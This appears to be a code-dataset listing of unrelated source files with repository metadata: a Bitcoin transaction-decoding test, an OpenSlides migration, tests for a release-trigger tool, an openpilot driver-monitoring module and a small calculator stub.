tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914dc863734a218bfe83ef770ee9d41a27f824a6e5688acee2a02000000000017a9142a5edea39971049a540474c6a99edf0aa4074c588700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('8e3730608c3b0bb5df54f09076e196bc292a8e39a78e73b44b6ba08c78f5cbb0', rpc_result['txid'])
assert_equal('0 3045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea[ALL] 3045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75[ALL] 5221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53ae', rpc_result['vin'][0]['scriptSig']['asm'])
assert_equal('OP_DUP OP_HASH160 dc863734a218bfe83ef770ee9d41a27f824a6e56 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 2a5edea39971049a540474c6a99edf0aa4074c58 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
txSave = CTransaction()
txSave.deserialize(BytesIO(hex_str_to_bytes(tx)))
# make sure that a specifically crafted op_return value will not pass all the IsDERSignature checks and then get decoded as a sighash type
tx = '01000000015ded05872fdbda629c7d3d02b194763ce3b9b1535ea884e3c8e765d42e316724020000006b48304502204c10d4064885c42638cbff3585915b322de33762598321145ba033fc796971e2022100bb153ad3baa8b757e30a2175bd32852d2e1cb9080f84d7e32fcdfd667934ef1b012103163c0ff73511ea1743fb5b98384a2ff09dd06949488028fd819f4d83f56264efffffffff0200000000000000000b6a0930060201000201000180380100000000001976a9141cabd296e753837c086da7a45a6c2fe0d49d7b7b88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_RETURN 300602010002010001', rpc_result['vout'][0]['scriptPubKey']['asm'])
# verify that we have not altered scriptPubKey processing even of a specially crafted P2PKH pubkeyhash and P2SH redeem script hash that is made to pass the der signature checks
tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914301102070101010101010102060101010101010188acee2a02000000000017a91430110207010101010101010206010101010101018700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_DUP OP_HASH160 3011020701010101010101020601010101010101 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 3011020701010101010101020601010101010101 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
# some more full transaction tests of varying specific scriptSigs. used instead of
# tests in decodescript_script_sig because the decodescript RPC is specifically
# for working on scriptPubKeys (argh!).
push_signature = bytes_to_hex_str(txSave.vin[0].scriptSig)[2:(0x48*2+4)]
signature = push_signature[2:]
der_signature = signature[:-2]
signature_sighash_decoded = der_signature + '[ALL]'
signature_2 = der_signature + '82'
push_signature_2 = '48' + signature_2
signature_2_sighash_decoded = der_signature + '[NONE|ANYONECANPAY]'
# 1) P2PK scriptSig
txSave.vin[0].scriptSig = hex_str_to_bytes(push_signature)
rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
assert_equal(signature_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# make sure that the sighash decodes come out correctly for a more complex / lesser used case.
txSave.vin[0].scriptSig = hex_str_to_bytes(push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
assert_equal(signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 2) multisig scriptSig
txSave.vin[0].scriptSig = hex_str_to_bytes('00' + push_signature + push_signature_2)
rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
assert_equal('0 ' + signature_sighash_decoded + ' ' + signature_2_sighash_decoded, rpc_result['vin'][0]['scriptSig']['asm'])
# 3) test a scriptSig that contains more than push operations.
# in fact, it contains an OP_RETURN with data specially crafted to cause improper decode if the code does not catch it.
txSave.vin[0].scriptSig = hex_str_to_bytes('6a143011020701010101010101020601010101010101')
rpc_result = self.nodes[0].decoderawtransaction(bytes_to_hex_str(txSave.serialize()))
assert_equal('OP_RETURN 3011020701010101010101020601010101010101', rpc_result['vin'][0]['scriptSig']['asm'])
def run_test(self):
self.decodescript_script_sig()
self.decodescript_script_pub_key()
self.decoderawtransaction_asm_sighashtype()
if __name__ == '__main__':
DecodeScriptTest().main()
| 71.32766
| 761
| 0.76053
|
4a0237c9a5ae7f868e4d954b83cdaac9226adde8
| 505
|
py
|
Python
|
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
squeakyflamingo/dlrgjugend-OpenSlides
|
4de9e140fe51b01b471dfc98ef3061617424acf8
|
[
"MIT"
] | null | null | null |
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
squeakyflamingo/dlrgjugend-OpenSlides
|
4de9e140fe51b01b471dfc98ef3061617424acf8
|
[
"MIT"
] | 1
|
2021-04-24T18:11:26.000Z
|
2021-04-24T18:11:26.000Z
|
server/openslides/motions/migrations/0042_motionpoll_change_fields_2.py
|
DLRG-Jugend-NDS/OpenSlides
|
03704e4852821ccd67fe23adb6e2c38b67d93732
|
[
"MIT"
] | null | null | null |
# Generated by jsangmeister on 2021-03-22 12:44
from django.db import migrations
from ...poll.migrations.poll_migration_helper import (
calculate_vote_fields,
set_is_pseudoanonymized,
)
class Migration(migrations.Migration):
dependencies = [
("motions", "0041_motionpoll_change_fields_1"),
]
operations = [
migrations.RunPython(set_is_pseudoanonymized("motions", "MotionPoll")),
migrations.RunPython(calculate_vote_fields("motions", "MotionPoll")),
]
| 24.047619
| 79
| 0.718812
|
4a0237d28deff262bfc369fb4248b28cfcf419fc
| 10,221
|
py
|
Python
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 23
|
2018-10-09T15:14:21.000Z
|
2022-01-24T12:18:57.000Z
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 160
|
2018-09-21T22:16:02.000Z
|
2022-03-30T21:51:35.000Z
|
tests/test_autorelease_trigger.py
|
dazuma/releasetool
|
c1ca9218f5c28734c3eb03c01ef4fd78d8b61a01
|
[
"Apache-2.0"
] | 19
|
2018-10-08T20:39:39.000Z
|
2021-07-28T15:17:14.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import patch, Mock
from autorelease import trigger
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_authorized_session")
def test_no_issues(
make_authorized_session, list_org_issues, trigger_kokoro_build_for_pull_request
):
list_org_issues.return_value = []
trigger.main("github-token", "kokoro-credentials")
make_authorized_session.assert_called_once()
trigger_kokoro_build_for_pull_request.assert_not_called()
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_adc_session")
def test_adc(make_adc_session, list_org_issues, trigger_kokoro_build_for_pull_request):
list_org_issues.return_value = []
trigger.main("github-token", None)
make_adc_session.assert_called_once()
trigger_kokoro_build_for_pull_request.assert_not_called()
@patch("autorelease.trigger.trigger_kokoro_build_for_pull_request")
@patch("autorelease.github.GitHub.list_org_issues")
@patch("autorelease.kokoro.make_authorized_session")
def test_processes_issues(
make_authorized_session, list_org_issues, trigger_kokoro_build_for_pull_request
):
pr1 = {
"base": {"ref": "abc123", "repo": {"full_name": "googleapis/java-asset"}},
"pull_request": {"html_url": "https://github.com/googleapis/java-asset"},
"title": "chore: release 1.2.3",
}
pr2 = {
"base": {"ref": "def456", "repo": {"full_name": "googleapis/nodejs-container"}},
"pull_request": {"html_url": "https://github.com/nodejs/java-container"},
"title": "chore: release 1.0.0",
}
list_org_issues.side_effect = [[pr1, pr2]]
trigger.main("github-token", "kokoro-credentials")
list_org_issues.assert_any_call(
org="googleapis",
state="closed",
labels="autorelease: tagged",
created_after="2021-04-01",
)
list_org_issues.assert_any_call(
org="GoogleCloudPlatform",
state="closed",
labels="autorelease: tagged",
created_after="2021-04-01",
)
assert trigger_kokoro_build_for_pull_request.call_count == 2
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_non_merged(trigger_build):
github = Mock()
github.update_pull_labels = Mock()
github.get_url.return_value = {
"merged_at": None,
"base": {"repo": {"full_name": "googleapis/java-asset"}},
}
issue = {
"pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"}
}
trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
github.update_pull_labels.assert_called_once()
trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["java"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_triggers_kokoro(trigger_build):
github = Mock()
github.get_url.return_value = {
"merged_at": "2021-01-01T09:00:00.000Z",
"merge_commit_sha": "abcd1234",
"base": {"repo": {"full_name": "googleapis/java-asset"}},
"html_url": "https://github.com/googleapis/java-asset/pulls/5",
}
issue = {
"pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"},
"merged_at": "2021-01-01T09:00:00.000Z",
}
trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
trigger_build.assert_called_once()
github.update_pull_labels.assert_called_once()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", [])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_not_in_allowlist(
trigger_build,
):
github = Mock()
github.get_url.return_value = {
"merged_at": "2021-01-01T09:00:00.000Z",
"merge_commit_sha": "abcd1234",
"base": {"repo": {"full_name": "googleapis/java-asset"}},
"html_url": "https://github.com/googleapis/java-asset/pulls/5",
}
issue = {
"pull_request": {"url": "https://api.github.com/googleapis/java-asset/pull/5"},
"merged_at": "2021-01-01T09:00:00.000Z",
}
trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["php"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_no_job_name(
trigger_build,
):
github = Mock()
github.get_url.return_value = {
"merged_at": "2021-01-01T09:00:00.000Z",
"base": {"repo": {"full_name": "googleapis/google-cloud-php"}},
"html_url": "https://github.com/googleapis/google-cloud-php/pulls/5",
}
issue = {
"pull_request": {
"url": "https://api.github.com/googleapis/google-cloud-php/pull/5"
},
"merged_at": "2021-01-01T09:00:00.000Z",
}
trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["php"])
@patch("autorelease.kokoro.trigger_build")
def test_trigger_kokoro_build_for_pull_request_skips_kokoro_if_already_triggered(
trigger_build,
):
github = Mock()
github.get_url.return_value = {
"merged_at": "2021-01-01T09:00:00.000Z",
"base": {"repo": {"full_name": "googleapis/google-cloud-php"}},
"html_url": "https://github.com/googleapis/google-cloud-php/pulls/5",
"labels": [{"id": 12345, "name": "autorelease: triggered"}],
}
issue = {
"pull_request": {
"url": "https://api.github.com/googleapis/google-cloud-php/pull/5"
},
"merged_at": "2021-01-01T09:00:00.000Z",
}
trigger.trigger_kokoro_build_for_pull_request(Mock(), github, issue, Mock())
trigger_build.assert_not_called()
@patch("autorelease.trigger.LANGUAGE_ALLOWLIST", ["java"])
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.github.GitHub.get_issue")
@patch("autorelease.github.GitHub.get_url")
@patch("autorelease.github.GitHub.update_pull_labels")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single(
trigger_build, update_pull_labels, get_url, get_issue, make_authorized_session
):
kokoro_session = Mock()
make_authorized_session.return_value = kokoro_session
get_issue.return_value = {
"title": "chore: release 1.2.3",
"pull_request": {
"html_url": "https://github.com/googleapis/java-trace/pull/1234",
"url": "https://api.github.com/repos/googleapis/java-trace/pulls/1234",
},
}
get_url.return_value = {
"merged_at": "2021-07-20T09:00:00.123Z",
"base": {"repo": {"full_name": "googleapis/java-trace"}},
"html_url": "https://github.com/googleapis/java-trace/pull/1234",
"merge_commit_sha": "abcd1234",
"labels": [{"id": 12345, "name": "autorelease: tagged"}],
}
pull_request_url = "https://github.com/googleapis/java-trace/pull/1234"
reporter = trigger.trigger_single(
"fake-github-token", "fake-kokoro-credentials", pull_request_url
)
assert len(reporter.results) == 1
trigger_build.assert_called_with(
kokoro_session,
job_name="cloud-devrel/client-libraries/java/java-trace/release/stage",
sha="abcd1234",
env_vars={
"AUTORELEASE_PR": "https://github.com/googleapis/java-trace/pull/1234"
},
)
update_pull_labels.assert_not_called()
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single_bad_url(trigger_build, make_authorized_session):
kokoro_session = Mock()
make_authorized_session.return_value = kokoro_session
pull_request_url = "https://github.com/googleapis/java-trace/issues/1234"
reporter = trigger.trigger_single(
"fake-github-token", "fake-kokoro-credentials", pull_request_url
)
assert len(reporter.results) == 1
trigger_build.assert_not_called()
@patch("autorelease.kokoro.make_authorized_session")
@patch("autorelease.github.GitHub.get_issue")
@patch("autorelease.github.GitHub.get_url")
@patch("autorelease.github.GitHub.update_pull_labels")
@patch("autorelease.kokoro.trigger_build")
def test_trigger_single_skips_already_triggered(
trigger_build, update_pull_labels, get_url, get_issue, make_authorized_session
):
kokoro_session = Mock()
make_authorized_session.return_value = kokoro_session
get_issue.return_value = {
"title": "chore: release 1.2.3",
"pull_request": {
"html_url": "https://github.com/googleapis/java-trace/pull/1234",
"url": "https://api.github.com/repos/googleapis/java-trace/pulls/1234",
},
}
get_url.return_value = {
"merged_at": "2021-07-20T09:00:00.123Z",
"base": {"repo": {"full_name": "googleapis/java-trace"}},
"html_url": "https://github.com/googleapis/java-trace/pull/1234",
"merge_commit_sha": "abcd1234",
"labels": [
{"id": 12345, "name": "autorelease: tagged"},
{"id": 12346, "name": "autorelease: triggered"},
],
}
pull_request_url = "https://github.com/googleapis/java-trace/pull/1234"
reporter = trigger.trigger_single(
"fake-github-token", "fake-kokoro-credentials", pull_request_url
)
assert len(reporter.results) == 1
trigger_build.assert_not_called()
| 37.996283
| 88
| 0.695724
|
4a0238aa2d561f9a2c14028fa15795f9b76a23c0
| 9,285
|
py
|
Python
|
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
selfdrive/controls/lib/driver_monitor.py
|
J7orWV8P9/openpilot
|
24e83ea06121598d6f6aa6e37c53161aae141b4c
|
[
"MIT"
] | null | null | null |
import numpy as np
from common.realtime import DT_CTRL, DT_DMON
from selfdrive.controls.lib.drive_helpers import create_event, EventTypes as ET
from common.filter_simple import FirstOrderFilter
from common.stat_live import RunningStatFilter
_AWARENESS_TIME = 600. # 1.6 minutes limit without user touching steering wheels make the car enter a terminal status
_AWARENESS_PRE_TIME_TILL_TERMINAL = 25. # a first alert is issued 25s before expiration
_AWARENESS_PROMPT_TIME_TILL_TERMINAL = 15. # a second alert is issued 15s before start decelerating the car
_DISTRACTED_TIME = 300.
_DISTRACTED_PRE_TIME_TILL_TERMINAL = 10.
_DISTRACTED_PROMPT_TIME_TILL_TERMINAL = 6.
_FACE_THRESHOLD = 0.4
_EYE_THRESHOLD = 0.4
_BLINK_THRESHOLD = 0.5 # 0.225
_PITCH_WEIGHT = 1.30 # 1.5 # pitch matters a lot more
_METRIC_THRESHOLD = 0.4
_PITCH_POS_ALLOWANCE = 0.04 # 0.08 # rad, to not be too sensitive on positive pitch
_PITCH_NATURAL_OFFSET = 0.13 # 0.1 # people don't seem to look straight when they drive relaxed, rather a bit up
_YAW_NATURAL_OFFSET = 0.08 # people don't seem to look straight when they drive relaxed, rather a bit to the right (center of car)
_DISTRACTED_FILTER_TS = 0.25 # 0.6Hz
_POSE_CALIB_MIN_SPEED = 13 # 30 mph
_POSE_OFFSET_MIN_COUNT = 600 # valid data counts before calibration completes, 1 seg is 600 counts
_POSE_OFFSET_MAX_COUNT = 3600 # stop deweighting new data after 6 min, aka "short term memory"
_RECOVERY_FACTOR_MAX = 5. # relative to minus step change
_RECOVERY_FACTOR_MIN = 1.25 # relative to minus step change
MAX_TERMINAL_ALERTS = 3 # not allowed to engage after 3 terminal alerts
# model output refers to center of cropped image, so need to apply the x displacement offset
RESIZED_FOCAL = 320.0
H, W, FULL_W = 320, 160, 426
class DistractedType():
NOT_DISTRACTED = 0
BAD_POSE = 1
BAD_BLINK = 2
def head_orientation_from_descriptor(angles_desc, pos_desc, rpy_calib):
# the output of these angles are in device frame
# so from driver's perspective, pitch is up and yaw is right
pitch_prnet = angles_desc[0]
yaw_prnet = angles_desc[1]
roll_prnet = angles_desc[2]
face_pixel_position = ((pos_desc[0] + .5)*W - W + FULL_W, (pos_desc[1]+.5)*H)
yaw_focal_angle = np.arctan2(face_pixel_position[0] - FULL_W//2, RESIZED_FOCAL)
pitch_focal_angle = np.arctan2(face_pixel_position[1] - H//2, RESIZED_FOCAL)
roll = roll_prnet
pitch = pitch_prnet + pitch_focal_angle
yaw = -yaw_prnet + yaw_focal_angle
# no calib for roll
pitch -= rpy_calib[1]
yaw -= rpy_calib[2]
return np.array([roll, pitch, yaw])
class DriverPose():
def __init__(self):
self.yaw = 0.
self.pitch = 0.
self.roll = 0.
self.pitch_offseter = RunningStatFilter(max_trackable=_POSE_OFFSET_MAX_COUNT)
self.yaw_offseter = RunningStatFilter(max_trackable=_POSE_OFFSET_MAX_COUNT)
class DriverBlink():
def __init__(self):
self.left_blink = 0.
self.right_blink = 0.
class DriverStatus():
def __init__(self):
self.pose = DriverPose()
self.pose_calibrated = self.pose.pitch_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT and \
self.pose.yaw_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT
self.blink = DriverBlink()
self.awareness = 1.
self.awareness_active = 1.
self.awareness_passive = 1.
self.driver_distracted = False
self.driver_distraction_filter = FirstOrderFilter(0., _DISTRACTED_FILTER_TS, DT_DMON)
self.face_detected = False
self.terminal_alert_cnt = 0
self.step_change = 0.
self.active_monitoring_mode = True
self.threshold_prompt = _DISTRACTED_PROMPT_TIME_TILL_TERMINAL / _DISTRACTED_TIME
self.is_rhd_region = False
self.is_rhd_region_checked = False
self._set_timers(active_monitoring=True)
def _set_timers(self, active_monitoring):
if self.active_monitoring_mode and self.awareness <= self.threshold_prompt:
if active_monitoring:
self.step_change = DT_CTRL / _DISTRACTED_TIME
else:
self.step_change = 0.
return # no exploit after orange alert
elif self.awareness <= 0.:
return
if active_monitoring:
# when falling back from passive mode to active mode, reset awareness to avoid false alert
if not self.active_monitoring_mode:
self.awareness_passive = self.awareness
self.awareness = self.awareness_active
self.threshold_pre = _DISTRACTED_PRE_TIME_TILL_TERMINAL / _DISTRACTED_TIME
self.threshold_prompt = _DISTRACTED_PROMPT_TIME_TILL_TERMINAL / _DISTRACTED_TIME
self.step_change = DT_CTRL / _DISTRACTED_TIME
self.active_monitoring_mode = True
else:
if self.active_monitoring_mode:
self.awareness_active = self.awareness
self.awareness = self.awareness_passive
self.threshold_pre = _AWARENESS_PRE_TIME_TILL_TERMINAL / _AWARENESS_TIME
self.threshold_prompt = _AWARENESS_PROMPT_TIME_TILL_TERMINAL / _AWARENESS_TIME
self.step_change = DT_CTRL / _AWARENESS_TIME
self.active_monitoring_mode = False
def _is_driver_distracted(self, pose, blink):
if not self.pose_calibrated:
pitch_error = pose.pitch - _PITCH_NATURAL_OFFSET
yaw_error = pose.yaw - _YAW_NATURAL_OFFSET
# add positive pitch allowance
if pitch_error > 0.:
pitch_error = max(pitch_error - _PITCH_POS_ALLOWANCE, 0.)
else:
pitch_error = pose.pitch - self.pose.pitch_offseter.filtered_stat.mean()
yaw_error = pose.yaw - self.pose.yaw_offseter.filtered_stat.mean()
pitch_error *= _PITCH_WEIGHT
pose_metric = np.sqrt(yaw_error**2 + pitch_error**2)
if pose_metric > _METRIC_THRESHOLD:
return DistractedType.BAD_POSE
elif (blink.left_blink + blink.right_blink)*0.5 > _BLINK_THRESHOLD:
return DistractedType.BAD_BLINK
else:
return DistractedType.NOT_DISTRACTED
def get_pose(self, driver_monitoring, cal_rpy, car_speed, op_engaged):
# 10 Hz
if len(driver_monitoring.faceOrientation) == 0 or len(driver_monitoring.facePosition) == 0:
return
self.pose.roll, self.pose.pitch, self.pose.yaw = head_orientation_from_descriptor(driver_monitoring.faceOrientation, driver_monitoring.facePosition, cal_rpy)
self.blink.left_blink = driver_monitoring.leftBlinkProb * (driver_monitoring.leftEyeProb>_EYE_THRESHOLD)
self.blink.right_blink = driver_monitoring.rightBlinkProb * (driver_monitoring.rightEyeProb>_EYE_THRESHOLD)
self.face_detected = driver_monitoring.faceProb > _FACE_THRESHOLD and not self.is_rhd_region
self.driver_distracted = self._is_driver_distracted(self.pose, self.blink)>0
# first order filters
self.driver_distraction_filter.update(self.driver_distracted)
# update offseter
# only update when driver is actively driving the car above a certain speed
if self.face_detected and car_speed>_POSE_CALIB_MIN_SPEED and not op_engaged:
self.pose.pitch_offseter.push_and_update(self.pose.pitch)
self.pose.yaw_offseter.push_and_update(self.pose.yaw)
self.pose_calibrated = self.pose.pitch_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT and \
self.pose.yaw_offseter.filtered_stat.n > _POSE_OFFSET_MIN_COUNT
self._set_timers(self.face_detected)
def update(self, events, driver_engaged, ctrl_active, standstill):
if (driver_engaged and self.awareness > 0) or not ctrl_active:
# reset only when on disengagement if red reached
self.awareness = 1.
self.awareness_active = 1.
self.awareness_passive = 1.
return events
driver_attentive = self.driver_distraction_filter.x < 0.37
awareness_prev = self.awareness
if (driver_attentive and self.face_detected and self.awareness > 0):
# only restore awareness when paying attention and alert is not red
self.awareness = min(self.awareness + ((_RECOVERY_FACTOR_MAX-_RECOVERY_FACTOR_MIN)*(1.-self.awareness)+_RECOVERY_FACTOR_MIN)*self.step_change, 1.)
if self.awareness == 1.:
self.awareness_passive = min(self.awareness_passive + self.step_change, 1.)
# don't display alert banner when awareness is recovering and has cleared orange
if self.awareness > self.threshold_prompt:
return events
# should always be counting if distracted unless at standstill and reaching orange
if (not self.face_detected or (self.driver_distraction_filter.x > 0.63 and self.driver_distracted and self.face_detected)) and \
not (standstill and self.awareness - self.step_change <= self.threshold_prompt):
self.awareness = max(self.awareness - self.step_change, -0.1)
alert = None
if self.awareness <= 0.:
# terminal red alert: disengagement required
alert = 'driverDistracted' if self.active_monitoring_mode else 'driverUnresponsive'
if awareness_prev > 0.:
self.terminal_alert_cnt += 1
elif self.awareness <= self.threshold_prompt:
# prompt orange alert
alert = 'promptDriverDistracted' if self.active_monitoring_mode else 'promptDriverUnresponsive'
elif self.awareness <= self.threshold_pre:
# pre green alert
alert = 'preDriverDistracted' if self.active_monitoring_mode else 'preDriverUnresponsive'
if alert is not None:
events.append(create_event(alert, [ET.WARNING]))
return events
| 42.788018
| 161
| 0.746688
|
4a023ba726ae0536550a5aa234c4a270c439bd04
| 27
|
py
|
Python
|
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
Calculator/Squareroot.py
|
Wve-program/IndividualCalculator
|
5b57b2f873c0ca36bb909490d16b147ce2e00d08
|
[
"MIT"
] | null | null | null |
import math
math.sqrt( x )
| 9
| 14
| 0.703704
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.